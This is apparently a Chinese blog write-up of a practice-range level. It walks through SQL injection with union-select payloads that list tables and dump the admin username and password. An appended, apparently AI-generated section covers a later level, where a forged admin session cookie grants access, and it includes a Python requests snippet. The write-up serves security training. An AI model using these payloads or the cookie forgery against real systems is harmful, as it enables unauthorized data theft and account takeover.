封神台靶场-第一章

本文详细介绍了如何通过SQL注入获取管理员密码的过程,包括查找注入点、确定注入类型、使用联合查询提取敏感信息等关键步骤。以具体案例演示了SQL注入攻击的全过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

第一章:为了女神小芳!

Tips:
通过sql注入拿到管理员密码!

  1. 寻找注入点,判断是什么注入
    |?id=1 and 1=1| 显示正常 |
    |-|–|
    | ?id=1and 1=2| 页面有变故(存在注入) |
    |?id=1’ | 页面有回显但是无法判断注入类型|
    |||在这里插入图片描述
    在这里插入图片描述

  2. 查看列数及字段数(这里通过二分法可以快速定位列数为2)
    在这里插入图片描述

  3. 联合查询(注意前面id为假才会执行后门的联合查询)
    |?id=121 union select 1,2 #| 查看回显位置 |
    |–|--|
    |?id=121 union select 1,database() #| 查看数据库 |
    |?id=121 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #| 查看表名 |
    |?id=112 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘admin’ #| 查看字段名 |
    |?id=112 union select 1,(select group_concat(username,0x3a,password) from admin) #|查询字段值 |

回显位置:2
在这里插入图片描述
数据库名:maoshe
在这里插入图片描述
表名:admin,dir,new,xss(猜测表明为admin)
在这里插入图片描述
字段名:id,uesename,password
在这里插入图片描述
账号密码:admin:hellohack
在这里插入图片描述

### 封神台靶场第三关解决方案 封神台靶场是一个专门为新手设计的学习平台,其中包含了大量常见的 Web 安全漏洞[^3]。对于第三关的挑战,通常涉及 Cookie 的篡改以及权限提升的技术。 #### 背景分析 在这一关中,目标通常是通过修改浏览器中的 Cookie 来获取管理员权限并访问受保护的内容。Cookie 是一种客户端存储机制,在许多情况下用于保存用户的会话状态或身份验证信息。攻击者可以通过伪造这些数据来模拟合法用户的身份[^2]。 #### 技术实现方法 以下是解决此问题的具体技术手段: 1. **识别关键字段** 首先观察登录后的请求头部分,找到名为 `ADMINSESSIONIDCSTRCSDQ` 的 Cookie 值。这是一个典型的会话 ID 字符串,可能用来区分不同用户的角色和权限。 2. **替换现有值** 使用开发者工具(如 Chrome DevTools),转到“Application”标签页下的 Storage -> Cookies 中定位站点对应的记录项。将原有的随机字符串更改为已知有效的管理级令牌: ```plaintext LBMLMBCCNPFINOANFGLPCFBC ``` 3. **重新加载页面** 修改完成后刷新当前网页即可触发新的认证流程。如果一切正常,则应该能够跳转至后台管理系统界面。 4. **后续操作** 成功突破后可以进一步探索系统内部结构,了解潜在的安全隐患所在之处。不过需要注意的是,在真实环境中未经授权擅自尝试此类行为属于违法行为,请仅限于授权范围内的练习环境内实践上述技巧[^1]。 ```python import requests from http.cookiejar import MozillaCookieJar # 设置自定义 cookies cookies = {'ADMINSESSIONIDCSTRCSDQ': 'LBMLMBCCNPFINOANFGLPCFBC'} response = requests.get('http://example.com/admin', cookies=cookies) print(response.text) ``` 以上代码片段展示了如何利用 Python 请求库发送带有特定 cookies 参数的 HTTP GET 请求,从而模仿具有特殊权限的访客身份访问受限资源。 #### 总结 通过对 Cookie 数据的手动编辑实现了越权访问的功能演示。这一步骤揭示了不当处理用户输入可能导致严重的安全隐患——即使是在看似无害的小型项目里也需格外小心对待安全性议题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值